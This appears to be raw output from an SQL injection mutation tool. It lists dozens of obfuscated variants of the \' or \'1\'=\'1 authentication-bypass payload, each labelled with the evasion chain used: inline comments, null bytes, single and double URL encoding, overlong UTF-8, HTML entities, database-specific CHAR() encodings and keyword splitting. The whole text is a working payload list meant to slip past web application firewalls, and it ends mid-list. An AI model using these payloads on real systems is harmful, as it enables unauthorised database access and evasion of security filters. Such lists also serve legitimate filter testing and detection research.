Mutation algoritm:usecomments space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: ['/*!*/\\/*!*/%/*!00*/%/*!27*/%/*!0d*/%/*!0aor*/%/*!0d*/%/*!0a*/\\/*!*/%/*!00*/%/*!271*/\\/*!*/%/*!00*/%/*!27*/=/*!*/\\/*!*/%/*!00*/%/*!271*/%/*!00*/', '/*!*/\\/*!*/%/*!00*/%/*!27*/%/*!0d*/%/*!0aor*/%/*!0d*/%/*!0a*/\\/*!*/%/*!00*/%/*!271*/\\/*!*/%/*!00*/%/*!27*/=/*!*/\\/*!*/%/*!00*/%/*!271*/%/*!00*/', '/*!*/\\/*!*/%/*!00*/%/*!27*/%/*!0d*/%/*!0aor*/%/*!0d*/%/*!0a*/\\/*!*/%/*!00*/%/*!271*/\\/*!*/%/*!00*/%/*!27*/=/*!*/\\/*!*/%/*!00*/%/*!271*/%/*!00*/', '/*!*/\\/*!*/%/*!/*!00*/%/*!27*/%/*!0d*/%/*!0aor*/%/*!0d*/%/*!0a*/\\/*!*/%/*!00*/%/*!271*/\\/*!*/%/*!00*/%/*!27*/=/*!*/\\/*!*/%/*!00*/%/*!271*/%/*!00*/*/', '/*!*///*!*/*/*!*/!/*!*/*/*!*///*!*/\\/*!*///*!*/*/*!*/!/*!*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!00*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!27*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!0d*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!0aor*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!0d*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!0a*/*/*!*///*!*/\\/*!*///*!*/*/*!*/!/*!*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!00*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!271*/*/*!*///*!*/\\/*!*///*!*/*/*!*/!/*!*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!00*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!27*/*/*!*///*!*/=/*!*///*!*/*/*!*/!/*!*/*/*!*///*!*/\\/*!*///*!*/*/*!*/!/*!*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!00*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!271*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!00*/*/*!*///*!*/']
Mutation algoritm:usecomments space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: ['/*!*/\\/*!*/%/*!00*/%/*!27*/%/*!0d*/%/*!0aor*/%/*!0d*/%/*!0a*/\\/*!*/%/*!00*/%/*!271*/\\/*!*/%/*!00*/%/*!27*/=/*!*/\\/*!*/%/*!00*/%/*!271*/%/*!00*/', '/*!*/\\/*!*/%/*!00*/%/*!27*/%/*!0d*/%/*!0aor*/%/*!0d*/%/*!0a*/\\/*!*/%/*!00*/%/*!271*/\\/*!*/%/*!00*/%/*!27*/=/*!*/\\/*!*/%/*!00*/%/*!271*/%/*!00*/', '/*!*/\\/*!*/%/*!00*/%/*!27*/%/*!0d*/%/*!0aor*/%/*!0d*/%/*!0a*/\\/*!*/%/*!00*/%/*!271*/\\/*!*/%/*!00*/%/*!27*/=/*!*/\\/*!*/%/*!00*/%/*!271*/%/*!00*/', '/*!*/\\/*!*/%/*!/*!00*/%/*!27*/%/*!0d*/%/*!0aor*/%/*!0d*/%/*!0a*/\\/*!*/%/*!00*/%/*!271*/\\/*!*/%/*!00*/%/*!27*/=/*!*/\\/*!*/%/*!00*/%/*!271*/%/*!00*/*/', '/*!*///*!*/*/*!*/!/*!*/*/*!*///*!*/\\/*!*///*!*/*/*!*/!/*!*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!00*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!27*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!0d*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!0aor*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!0d*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!0a*/*/*!*///*!*/\\/*!*///*!*/*/*!*/!/*!*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!00*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!271*/*/*!*///*!*/\\/*!*///*!*/*/*!*/!/*!*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!00*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!27*/*/*!*///*!*/=/*!*///*!*/*/*!*/!/*!*/*/*!*///*!*/\\/*!*///*!*/*/*!*/!/*!*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!00*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!271*/*/*!*///*!*/%/*!*///*!*/*/*!*/!/*!00*/*/*!*///*!*/']
Mutation algoritm:usecomments space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: ['\\%/*!00%27%0d%0aor%0d%0a\\%00%271\\%00%27=\\%00%271%00*/', '\\%/*!00%27%0d%0aor%0d%0a\\%00%271\\%00%27=\\%00%271%00*/', '\\%/*!00%27%0d%0aor%0d%0a\\%00%271\\%00%27=\\%00%271%00*/', '\\%/*!/*!00%27%0d%0aor%0d%0a\\%00%271\\%00%27=\\%00%271%00*/*/', '/*!*/\\/*!*/%/*!*///*!*/*/*!*/!/*!00*/%/*!27*/%/*!0d*/%/*!0aor*/%/*!0d*/%/*!0a*/\\/*!*/%/*!00*/%/*!271*/\\/*!*/%/*!00*/%/*!27*/=/*!*/\\/*!*/%/*!00*/%/*!271*/%/*!00*/*/*!*///*!*/']
Mutation algoritm:usecomments space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: ['\\%/*!00%27%0d%0aor%0d%0a\\%00%271\\%00%27=\\%00%271%00*/', '\\%/*!00%27%0d%0aor%0d%0a\\%00%271\\%00%27=\\%00%271%00*/', '\\%/*!00%27%0d%0aor%0d%0a\\%00%271\\%00%27=\\%00%271%00*/', '\\%/*!/*!00%27%0d%0aor%0d%0a\\%00%271\\%00%27=\\%00%271%00*/*/', '/*!*/\\/*!*/%/*!*///*!*/*/*!*/!/*!00*/%/*!27*/%/*!0d*/%/*!0aor*/%/*!0d*/%/*!0a*/\\/*!*/%/*!00*/%/*!271*/\\/*!*/%/*!00*/%/*!27*/=/*!*/\\/*!*/%/*!00*/%/*!271*/%/*!00*/*/*!*///*!*/']
Mutation algoritm:usecomments space20d0a appendnullbyte apostrophenullencode 
Result: ['\\%00%27%0d%0aor%0d%0a\\%00%271\\%00%27=\\%00%271%00', '\\%00%27%0d%0aor%0d%0a\\%00%271\\%00%27=\\%00%271%00', '\\%00%27%0d%0aor%0d%0a\\%00%271\\%00%27=\\%00%271%00', '\\%/*!00%27%0d%0aor%0d%0a\\%00%271\\%00%27=\\%00%271%00*/', '/*!*/\\/*!*/%/*!00*/%/*!27*/%/*!0d*/%/*!0aor*/%/*!0d*/%/*!0a*/\\/*!*/%/*!00*/%/*!271*/\\/*!*/%/*!00*/%/*!27*/=/*!*/\\/*!*/%/*!00*/%/*!271*/%/*!00*/']
Mutation algoritm:usecomments space20d0a appendnullbyte apostrophenullencode 
Result: ['\\%00%27%0d%0aor%0d%0a\\%00%271\\%00%27=\\%00%271%00', '\\%00%27%0d%0aor%0d%0a\\%00%271\\%00%27=\\%00%271%00', '\\%00%27%0d%0aor%0d%0a\\%00%271\\%00%27=\\%00%271%00', '\\%/*!00%27%0d%0aor%0d%0a\\%00%271\\%00%27=\\%00%271%00*/', '/*!*/\\/*!*/%/*!00*/%/*!27*/%/*!0d*/%/*!0aor*/%/*!0d*/%/*!0a*/\\/*!*/%/*!00*/%/*!271*/\\/*!*/%/*!00*/%/*!27*/=/*!*/\\/*!*/%/*!00*/%/*!271*/%/*!00*/']
Mutation algoritm:usecomments 
Result: ["\\'/**/or/**/\\'1\\'=\\'1", "\\'/%2A%2A/or/%2A%2A/\\'1\\'=\\'1", "\\'%0d%0aor%0d%0a\\'1\\'=\\'1", "\\' /*!or \\'1\\'=\\'1*/", "/*!*/\\/*!*/'/*!*/ /*!or*/ /*!*/\\/*!*/'/*!1*/\\/*!*/'/*!*/=/*!*/\\/*!*/'/*!1*/"]
Mutation algoritm:usecomments 
Result: ["\\'/**/or/**/\\'1\\'=\\'1", "\\'/%2A%2A/or/%2A%2A/\\'1\\'=\\'1", "\\'%0d%0aor%0d%0a\\'1\\'=\\'1", "\\' /*!or \\'1\\'=\\'1*/", "/*!*/\\/*!*/'/*!*/ /*!or*/ /*!*/\\/*!*/'/*!1*/\\/*!*/'/*!*/=/*!*/\\/*!*/'/*!1*/"]
Mutation algoritm:usecomments 
Result: ["\\'/**/or/**/\\'1\\'=\\'1", "\\'/%2A%2A/or/%2A%2A/\\'1\\'=\\'1", "\\'%0d%0aor%0d%0a\\'1\\'=\\'1", "\\' /*!or \\'1\\'=\\'1*/", "/*!*/\\/*!*/'/*!*/ /*!or*/ /*!*/\\/*!*/'/*!1*/\\/*!*/'/*!*/=/*!*/\\/*!*/'/*!1*/"]
Mutation algoritm:usecomments 
Result: ["\\'/**/or/**/\\'1\\'=\\'1", "\\'/%2A%2A/or/%2A%2A/\\'1\\'=\\'1", "\\'%0d%0aor%0d%0a\\'1\\'=\\'1", "\\' /*!or \\'1\\'=\\'1*/", "/*!*/\\/*!*/'/*!*/ /*!or*/ /*!*/\\/*!*/'/*!1*/\\/*!*/'/*!*/=/*!*/\\/*!*/'/*!1*/"]
Mutation algoritm:usecomments 
Result: ["\\'/**/or/**/\\'1\\'=\\'1", "\\'/%2A%2A/or/%2A%2A/\\'1\\'=\\'1", "\\'%0d%0aor%0d%0a\\'1\\'=\\'1", "\\' /*!or \\'1\\'=\\'1*/", "/*!*/\\/*!*/'/*!*/ /*!or*/ /*!*/\\/*!*/'/*!1*/\\/*!*/'/*!*/=/*!*/\\/*!*/'/*!1*/"]
Mutation algoritm:urlecode space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: %2F%2A%21%2A%2F%5C%2F%2A%21%2A%2F%25%2F%2A%2100%2A%2F%25%2F%2A%2127%2A%2F%25%2F%2A%210d%2A%2F%25%2F%2A%210aor%2A%2F%25%2F%2A%210d%2A%2F%25%2F%2A%210a%2A%2F%5C%2F%2A%21%2A%2F%25%2F%2A%2100%2A%2F%25%2F%2A%21271%2A%2F%5C%2F%2A%21%2A%2F%25%2F%2A%2100%2A%2F%25%2F%2A%2127%2A%2F%3D%2F%2A%21%2A%2F%5C%2F%2A%21%2A%2F%25%2F%2A%2100%2A%2F%25%2F%2A%21271%2A%2F%25%2F%2A%2100%2A%2F
Mutation algoritm:urlecode space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: %5C%25%2F%2A%2100%2527%250d%250aor%250d%250a%5C%2500%25271%5C%2500%2527%3D%5C%2500%25271%2500%2A%2F
Mutation algoritm:urlecode space20d0a appendnullbyte apostrophenullencode 
Result: %5C%2500%2527%250d%250aor%250d%250a%5C%2500%25271%5C%2500%2527%3D%5C%2500%25271%2500
Mutation algoritm:urlecode 
Result: %5C%27%20or%20%5C%271%5C%27%3D%5C%271
Mutation algoritm:unmagicquotes 
Result: \%bf%27 or \'1\'=\'1-- 
Mutation algoritm:StringConcatenation space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: /*!*/\/*!*/%/*!00*/%/*!27*/%/*!0d*/%/*!0EXEC(a' + 'or)*/%/*!0d*/%/*!0a*/\/*!*/%/*!00*/%/*!271*/\/*!*/%/*!00*/%/*!27*/=/*!*/\/*!*/%/*!00*/%/*!271*/%/*!00*/
Mutation algoritm:StringConcatenation space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: \%/*!00%27%0d%0EXEC(a' + 'or)%0d%0a\%00%271\%00%27=\%00%271%00*/
Mutation algoritm:StringConcatenation space20d0a appendnullbyte apostrophenullencode 
Result: \%00%27%0d%0EXEC(a' + 'or)%0d%0a\%00%271\%00%27=\%00%271%00
Mutation algoritm:StringConcatenation 
Result: \' EXEC(o' + 'r) \'1\'=\'1
Mutation algoritm:space2mssqlhash 
Result: \'%23%0Aor%23%0A\'1\'=\'1
Mutation algoritm:space2morecomment 
Result: \'/**_**/or/**_**/\'1\'=\'1
Mutation algoritm:space2dash 
Result: \'--fvUWhgR%0Aor--KRqiAD%0A\'1\'=\'1
Mutation algoritm:overlongutf8 space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: %C0%AF%C0%AA%C0%AB%C0%AA%C0%AF%C0%DE%C0%AF%C0%AA%C0%AB%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB00%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB27%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB0d%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB0aor%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB0d%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB0a%C0%AA%C0%AF%C0%DE%C0%AF%C0%AA%C0%AB%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB00%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB271%C0%AA%C0%AF%C0%DE%C0%AF%C0%AA%C0%AB%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB00%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB27%C0%AA%C0%AF%C0%BF%C0%AF%C0%AA%C0%AB%C0%AA%C0%AF%C0%DE%C0%AF%C0%AA%C0%AB%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB00%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB271%C0%AA%C0%AF%C0%AF%C0%AF%C0%AA%C0%AB00%C0%AA%C0%AF
Mutation algoritm:overlongutf8 space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: %C0%DE%C0%AF%C0%AF%C0%AA%C0%AB00%27%0d%0aor%0d%0a%C0%DE%00%271%C0%DE%00%27%C0%BF%C0%DE%00%271%00%C0%AA%C0%AF
Mutation algoritm:overlongutf8 space20d0a appendnullbyte apostrophenullencode 
Result: %C0%DE%00%27%0d%0aor%0d%0a%C0%DE%00%271%C0%DE%00%27%C0%BF%C0%DE%00%271%00
Mutation algoritm:overlongutf8 
Result: %C0%DE%C0%AF%C0%AAor%C0%AA%C0%DE%C0%AF1%C0%DE%C0%AF%C0%BF%C0%DE%C0%AF1
Mutation algoritm:modsecurityzeroversioned 
Result: \' /*!00000or \'1\'=\'1*/
Mutation algoritm:keywordsplitting space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: /*!*/\/*!*/%/*!0<0*/%/*!2<7*/%/*!0<d*/%/*!0<aor*/%/*!0<d*/%/*!0<a*/\/*!*/%/*!0<0*/%/*!2<71*/\/*!*/%/*!0<0*/%/*!2<7*/=/*!*/\/*!*/%/*!0<0*/%/*!27<1*/%/*!0<0*/
Mutation algoritm:keywordsplitting space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: \%/*!0<0%2<7%0<d%0ao<r%0<d%0<a\%0<0%2<71\%0<0%2<7=\%0<0%27<1%0<0*/
Mutation algoritm:keywordsplitting space20d0a appendnullbyte apostrophenullencode 
Result: \%0<0%2<7%0<d%0<aor%0<d%0<a\%0<0%27<1\%0<0%2<7=\%0<0%2<71%0<0
Mutation algoritm:keywordsplitting 
Result: \' o<r \'1\'=\'1
Mutation algoritm:htmlencode space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: &#47;&#42;&#33;&#42;&#47;&#92;&#47;&#42;&#33;&#42;&#47;&#37;&#47;&#42;&#33;00&#42;&#47;&#37;&#47;&#42;&#33;27&#42;&#47;&#37;&#47;&#42;&#33;0d&#42;&#47;&#37;&#47;&#42;&#33;0aor&#42;&#47;&#37;&#47;&#42;&#33;0d&#42;&#47;&#37;&#47;&#42;&#33;0a&#42;&#47;&#92;&#47;&#42;&#33;&#42;&#47;&#37;&#47;&#42;&#33;00&#42;&#47;&#37;&#47;&#42;&#33;271&#42;&#47;&#92;&#47;&#42;&#33;&#42;&#47;&#37;&#47;&#42;&#33;00&#42;&#47;&#37;&#47;&#42;&#33;27&#42;&#47;&#61;&#47;&#42;&#33;&#42;&#47;&#92;&#47;&#42;&#33;&#42;&#47;&#37;&#47;&#42;&#33;00&#42;&#47;&#37;&#47;&#42;&#33;271&#42;&#47;&#37;&#47;&#42;&#33;00&#42;&#47;
Mutation algoritm:htmlencode space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: &#92;&#37;&#47;&#42;&#33;00&#37;27&#37;0d&#37;0aor&#37;0d&#37;0a&#92;&#37;00&#37;271&#92;&#37;00&#37;27&#61;&#92;&#37;00&#37;271&#37;00&#42;&#47;
Mutation algoritm:htmlencode space20d0a appendnullbyte apostrophenullencode 
Result: &#92;&#37;00&#37;27&#37;0d&#37;0aor&#37;0d&#37;0a&#92;&#37;00&#37;271&#92;&#37;00&#37;27&#61;&#92;&#37;00&#37;271&#37;00
Mutation algoritm:htmlencode 
Result: &#92;&#39;&#32;or&#32;&#92;&#39;1&#92;&#39;&#61;&#92;&#39;1
Mutation algoritm:escapequotes 
Result: \\' or \\'1\\'=\\'1
Mutation algoritm:doubleurlecode space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: %252F%252A%2521%252A%252F%255C%252F%252A%2521%252A%252F%2525%252F%252A%252100%252A%252F%2525%252F%252A%252127%252A%252F%2525%252F%252A%25210d%252A%252F%2525%252F%252A%25210aor%252A%252F%2525%252F%252A%25210d%252A%252F%2525%252F%252A%25210a%252A%252F%255C%252F%252A%2521%252A%252F%2525%252F%252A%252100%252A%252F%2525%252F%252A%2521271%252A%252F%255C%252F%252A%2521%252A%252F%2525%252F%252A%252100%252A%252F%2525%252F%252A%252127%252A%252F%253D%252F%252A%2521%252A%252F%255C%252F%252A%2521%252A%252F%2525%252F%252A%252100%252A%252F%2525%252F%252A%2521271%252A%252F%2525%252F%252A%252100%252A%252F
Mutation algoritm:doubleurlecode space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: %255C%2525%252F%252A%252100%252527%25250d%25250aor%25250d%25250a%255C%252500%2525271%255C%252500%252527%253D%255C%252500%2525271%252500%252A%252F
Mutation algoritm:doubleurlecode space20d0a appendnullbyte apostrophenullencode 
Result: %255C%252500%252527%25250d%25250aor%25250d%25250a%255C%252500%2525271%255C%252500%252527%253D%255C%252500%2525271%252500
Mutation algoritm:doubleurlecode 
Result: %255C%2527%2520or%2520%255C%25271%255C%2527%253D%255C%25271
Mutation algoritm:charencode space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: %2F%2A%21%2A%2F%5C%2F%2A%21%2A%2F%25%2F%2A%21%30%30%2A%2F%25%2F%2A%21%32%37%2A%2F%25%2F%2A%21%30%64%2A%2F%25%2F%2A%21%30%61%6F%72%2A%2F%25%2F%2A%21%30%64%2A%2F%25%2F%2A%21%30%61%2A%2F%5C%2F%2A%21%2A%2F%25%2F%2A%21%30%30%2A%2F%25%2F%2A%21%32%37%31%2A%2F%5C%2F%2A%21%2A%2F%25%2F%2A%21%30%30%2A%2F%25%2F%2A%21%32%37%2A%2F%3D%2F%2A%21%2A%2F%5C%2F%2A%21%2A%2F%25%2F%2A%21%30%30%2A%2F%25%2F%2A%21%32%37%31%2A%2F%25%2F%2A%21%30%30%2A%2F
Mutation algoritm:charencode space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: %5C%25%2F%2A%21%30%30%27%0d%0a%6F%72%0d%0a%5C%00%27%31%5C%00%27%3D%5C%00%27%31%00%2A%2F
Mutation algoritm:charencode space20d0a appendnullbyte apostrophenullencode 
Result: %5C%00%27%0d%0a%6F%72%0d%0a%5C%00%27%31%5C%00%27%3D%5C%00%27%31%00
Mutation algoritm:charencode 
Result: %5C%27%20%6F%72%20%5C%27%31%5C%27%3D%5C%27%31
Mutation algoritm:chardoubleencode space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: %252F%252A%2521%252A%252F%255C%252F%252A%2521%252A%252F%2525%252F%252A%2521%2530%2530%252A%252F%2525%252F%252A%2521%2532%2537%252A%252F%2525%252F%252A%2521%2530%2564%252A%252F%2525%252F%252A%2521%2530%2561%256F%2572%252A%252F%2525%252F%252A%2521%2530%2564%252A%252F%2525%252F%252A%2521%2530%2561%252A%252F%255C%252F%252A%2521%252A%252F%2525%252F%252A%2521%2530%2530%252A%252F%2525%252F%252A%2521%2532%2537%2531%252A%252F%255C%252F%252A%2521%252A%252F%2525%252F%252A%2521%2530%2530%252A%252F%2525%252F%252A%2521%2532%2537%252A%252F%253D%252F%252A%2521%252A%252F%255C%252F%252A%2521%252A%252F%2525%252F%252A%2521%2530%2530%252A%252F%2525%252F%252A%2521%2532%2537%2531%252A%252F%2525%252F%252A%2521%2530%2530%252A%252F
Mutation algoritm:chardoubleencode space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: %255C%2525%252F%252A%2521%2530%2530%2527%250d%250a%256F%2572%250d%250a%255C%2500%2527%2531%255C%2500%2527%253D%255C%2500%2527%2531%2500%252A%252F
Mutation algoritm:chardoubleencode space20d0a appendnullbyte apostrophenullencode 
Result: %255C%2500%2527%250d%250a%256F%2572%250d%250a%255C%2500%2527%2531%255C%2500%2527%253D%255C%2500%2527%2531%2500
Mutation algoritm:chardoubleencode 
Result: %255C%2527%2520%256F%2572%2520%255C%2527%2531%255C%2527%253D%255C%2527%2531
Mutation algoritm:CharacterEncoding_char_MSSql space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: /*!*/\/*!*/%/*!Char(0000030)+Char(0000030)*/%/*!Char(0000032)+Char(0000037)*/%/*!Char(0000030)+Char(0000064)*/%/*!Char(0000030)+Char(0000061)+Char(000006f)+Char(0000072)*/%/*!Char(0000030)+Char(0000064)*/%/*!Char(0000030)+Char(0000061)*/\/*!*/%/*!Char(0000030)+Char(0000030)*/%/*!Char(0000032)+Char(0000037)+Char(0000031)*/\/*!*/%/*!Char(0000030)+Char(0000030)*/%/*!Char(0000032)+Char(0000037)*/=/*!*/\/*!*/%/*!Char(0000030)+Char(0000030)*/%/*!Char(0000032)+Char(0000037)+Char(0000031)*/%/*!Char(0000030)+Char(0000030)*/
Mutation algoritm:CharacterEncoding_char_MSSql space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: \%/*!Char(0000030)+Char(0000030)%Char(0000032)+Char(0000037)%Char(0000030)+Char(0000064)%Char(0000030)+Char(0000061)+Char(000006f)+Char(0000072)%Char(0000030)+Char(0000064)%Char(0000030)+Char(0000061)\%Char(0000030)+Char(0000030)%Char(0000032)+Char(0000037)+Char(0000031)\%Char(0000030)+Char(0000030)%Char(0000032)+Char(0000037)=\%Char(0000030)+Char(0000030)%Char(0000032)+Char(0000037)+Char(0000031)%Char(0000030)+Char(0000030)*/
Mutation algoritm:CharacterEncoding_char_MSSql space20d0a appendnullbyte apostrophenullencode 
Result: \%Char(0000030)+Char(0000030)%Char(0000032)+Char(0000037)%Char(0000030)+Char(0000064)%Char(0000030)+Char(0000061)+Char(000006f)+Char(0000072)%Char(0000030)+Char(0000064)%Char(0000030)+Char(0000061)\%Char(0000030)+Char(0000030)%Char(0000032)+Char(0000037)+Char(0000031)\%Char(0000030)+Char(0000030)%Char(0000032)+Char(0000037)=\%Char(0000030)+Char(0000030)%Char(0000032)+Char(0000037)+Char(0000031)%Char(0000030)+Char(0000030)
Mutation algoritm:CharacterEncoding_char_MSSql 
Result: \' Char(000006f)+Char(0000072) \'Char(0000031)\'=\'Char(0000031)
Mutation algoritm:CharacterEncoding_charOracle space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: /*!*/\/*!*/%/*!Char(0000030) || Char(0000030)*/%/*!Char(0000032) || Char(0000037)*/%/*!Char(0000030) || Char(0000064)*/%/*!Char(0000030) || Char(0000061) || Char(000006f) || Char(0000072)*/%/*!Char(0000030) || Char(0000064)*/%/*!Char(0000030) || Char(0000061)*/\/*!*/%/*!Char(0000030) || Char(0000030)*/%/*!Char(0000032) || Char(0000037) || Char(0000031)*/\/*!*/%/*!Char(0000030) || Char(0000030)*/%/*!Char(0000032) || Char(0000037)*/=/*!*/\/*!*/%/*!Char(0000030) || Char(0000030)*/%/*!Char(0000032) || Char(0000037) || Char(0000031)*/%/*!Char(0000030) || Char(0000030)*/
Mutation algoritm:CharacterEncoding_charOracle space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: \%/*!Char(0000030) || Char(0000030)%Char(0000032) || Char(0000037)%Char(0000030) || Char(0000064)%Char(0000030) || Char(0000061) || Char(000006f) || Char(0000072)%Char(0000030) || Char(0000064)%Char(0000030) || Char(0000061)\%Char(0000030) || Char(0000030)%Char(0000032) || Char(0000037) || Char(0000031)\%Char(0000030) || Char(0000030)%Char(0000032) || Char(0000037)=\%Char(0000030) || Char(0000030)%Char(0000032) || Char(0000037) || Char(0000031)%Char(0000030) || Char(0000030)*/
Mutation algoritm:CharacterEncoding_charOracle space20d0a appendnullbyte apostrophenullencode 
Result: \%Char(0000030) || Char(0000030)%Char(0000032) || Char(0000037)%Char(0000030) || Char(0000064)%Char(0000030) || Char(0000061) || Char(000006f) || Char(0000072)%Char(0000030) || Char(0000064)%Char(0000030) || Char(0000061)\%Char(0000030) || Char(0000030)%Char(0000032) || Char(0000037) || Char(0000031)\%Char(0000030) || Char(0000030)%Char(0000032) || Char(0000037)=\%Char(0000030) || Char(0000030)%Char(0000032) || Char(0000037) || Char(0000031)%Char(0000030) || Char(0000030)
Mutation algoritm:CharacterEncoding_charOracle 
Result: \' Char(000006f) || Char(0000072) \'Char(0000031)\'=\'Char(0000031)
Mutation algoritm:CharacterEncoding_charMysql space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: Char()/Char()*Char()!Char()*Char()/Char()\Char()/Char()*Char()!Char()*Char()/Char()%Char()/Char()*Char()!Char(0000030,0000030)*Char()/Char()%Char()/Char()*Char()!Char(0000032,0000037)*Char()/Char()%Char()/Char()*Char()!Char(0000030,0000064)*Char()/Char()%Char()/Char()*Char()!Char(0000030,0000061,000006f,0000072)*Char()/Char()%Char()/Char()*Char()!Char(0000030,0000064)*Char()/Char()%Char()/Char()*Char()!Char(0000030,0000061)*Char()/Char()\Char()/Char()*Char()!Char()*Char()/Char()%Char()/Char()*Char()!Char(0000030,0000030)*Char()/Char()%Char()/Char()*Char()!Char(0000032,0000037,0000031)*Char()/Char()\Char()/Char()*Char()!Char()*Char()/Char()%Char()/Char()*Char()!Char(0000030,0000030)*Char()/Char()%Char()/Char()*Char()!Char(0000032,0000037)*Char()/Char()=Char()/Char()*Char()!Char()*Char()/Char()\Char()/Char()*Char()!Char()*Char()/Char()%Char()/Char()*Char()!Char(0000030,0000030)*Char()/Char()%Char()/Char()*Char()!Char(0000032,0000037,0000031)*Char()/Char()%Char()/Char()*Char()!Char(0000030,0000030)*Char()/Char()
Mutation algoritm:CharacterEncoding_charMysql space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: Char()\Char()%Char()/Char()*Char()!Char(0000030,0000030)%Char(0000032,0000037)%Char(0000030,0000064)%Char(0000030,0000061,000006f,0000072)%Char(0000030,0000064)%Char(0000030,0000061)\Char()%Char(0000030,0000030)%Char(0000032,0000037,0000031)\Char()%Char(0000030,0000030)%Char(0000032,0000037)=Char()\Char()%Char(0000030,0000030)%Char(0000032,0000037,0000031)%Char(0000030,0000030)*Char()/Char()
Mutation algoritm:CharacterEncoding_charMysql space20d0a appendnullbyte apostrophenullencode 
Result: Char()\Char()%Char(0000030,0000030)%Char(0000032,0000037)%Char(0000030,0000064)%Char(0000030,0000061,000006f,0000072)%Char(0000030,0000064)%Char(0000030,0000061)\Char()%Char(0000030,0000030)%Char(0000032,0000037,0000031)\Char()%Char(0000030,0000030)%Char(0000032,0000037)=Char()\Char()%Char(0000030,0000030)%Char(0000032,0000037,0000031)%Char(0000030,0000030)
Mutation algoritm:CharacterEncoding_charMysql 
Result: Char()\Char()'Char() Char(000006f,0000072) Char()\Char()'Char(0000031)\Char()'Char()=Char()\Char()'Char(0000031)
Mutation algoritm:change_first_char_to_url space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: /*!*/\/*!*/%/*!%480*/%/*!%507*/%/*!%48d*/%/*!%48aor*/%/*!%48d*/%/*!%48a*/\/*!*/%/*!%480*/%/*!%5071*/\/*!*/%/*!%480*/%/*!%507*/=/*!*/\/*!*/%/*!%480*/%/*!%5071*/%/*!%480*/
Mutation algoritm:change_first_char_to_url space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: \%/*!%480%%507%%48d%%48aor%%48d%%48a\%%480%%5071\%%480%%507=\%%480%%5071%%480*/
Mutation algoritm:change_first_char_to_url space20d0a appendnullbyte apostrophenullencode 
Result: \%%480%%507%%48d%%48aor%%48d%%48a\%%480%%5071\%%480%%507=\%%480%%5071%%480
Mutation algoritm:change_first_char_to_url 
Result: \' %111r \'%49\'=\'%49
Mutation algoritm:caseinsensitive space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: /*!*/\/*!*/%/*!00*/%/*!27*/%/*!0d*/%/*!0aOr*/%/*!0d*/%/*!0a*/\/*!*/%/*!00*/%/*!271*/\/*!*/%/*!00*/%/*!27*/=/*!*/\/*!*/%/*!00*/%/*!271*/%/*!00*/
Mutation algoritm:caseinsensitive space_to_tab space20d0a appendnullbyte apostrophenullencode 
Result: \%/*!00%27%0d%0aOr%0d%0a\%00%271\%00%27=\%00%271%00*/
Mutation algoritm:caseinsensitive space20d0a appendnullbyte apostrophenullencode 
